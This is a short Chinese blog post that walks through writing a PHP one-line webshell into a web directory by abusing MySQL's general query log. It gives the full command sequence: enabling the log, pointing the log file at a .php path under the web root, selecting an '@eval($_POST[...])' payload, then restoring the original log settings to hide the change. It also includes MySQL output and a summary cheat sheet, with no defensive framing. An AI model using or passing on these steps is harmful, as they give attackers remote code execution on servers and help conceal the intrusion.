利用mysql数据库的日志 添加一句话木马

  • 查看配置
show variables like '%general%';
 
mysql> show variables like '%general%';
+------------------+--------------------------------------------------------+
| Variable_name    | Value                                                  |
+------------------+--------------------------------------------------------+
| general_log      | OFF                                                    |
| general_log_file | D:\wamp\bin\mysql\mysql5.6.17\data\DESKTOP-U3B8JVN.log |
+------------------+--------------------------------------------------------+
2 rows in set (0.11 sec)
  • 开启general log模式
set global general_log = on;
  • 设定日志文件的位置
set global general_log_file = 'd:\\wwwroot\\test.php';
set global general_log_file = 'D:\\wamp\\www\\mysql_log\\codervibe_shell.php';


<?php @eval($_POST['codervibe']); ?>
  • 插入 一句话木马
select '<?php @eval($_POST['codervibe']); ?>'
 
mysql> select '<?php @eval($_POST['codervibe']); ?>'
  • 关闭general log模式
set global general_log = off;
  • 连接完成后 将位置还原回 原来的设定并关闭
set global general_log_file = 'D:\\wamp\\www\\mysql_log\\codervibe_shell.php';
set global general_log_file = 'D:\\wamp\\bin\\mysql\\mysql5.6.17\\data\\DESKTOP-U3B8JVN.log';
  • 关闭数据库日志
set global general_log = off;  
mysql> show variables like '%general%';
+------------------+--------------------------------------------+
| Variable_name    | Value                                      |
+------------------+--------------------------------------------+
| general_log      | ON                                         |
| general_log_file | D:\wamp\www\mysql_log\codervibe_shell2.php |
+------------------+--------------------------------------------+
2 rows in set (0.00 sec)

mysql> set global general_log_file = 'D:\\wamp\\bin\\mysql\\mysql5.6.17\\data\\DESKTOP-U3B8JVN.log';
Query OK, 0 rows affected (0.09 sec)

mysql> set global general_log = off;
Query OK, 0 rows affected (0.06 sec)

总结

show variables like '%general%';             #查看配置
set global general_log = on;                 #开启general log模式
set global general_log_file = 'd:\\wwwroot\\test.php'; #设置日志目录为shell地址
select ''             #写入shell
set global general_log=off;                  #关闭general log模式

__EOF__

本文作者ZapcoMan
本文链接https://www.cnblogs.com/ZapcoMan/p/18455040.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   ZapcoMan  阅读(91)  评论(0编辑  收藏  举报
编辑推荐:
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示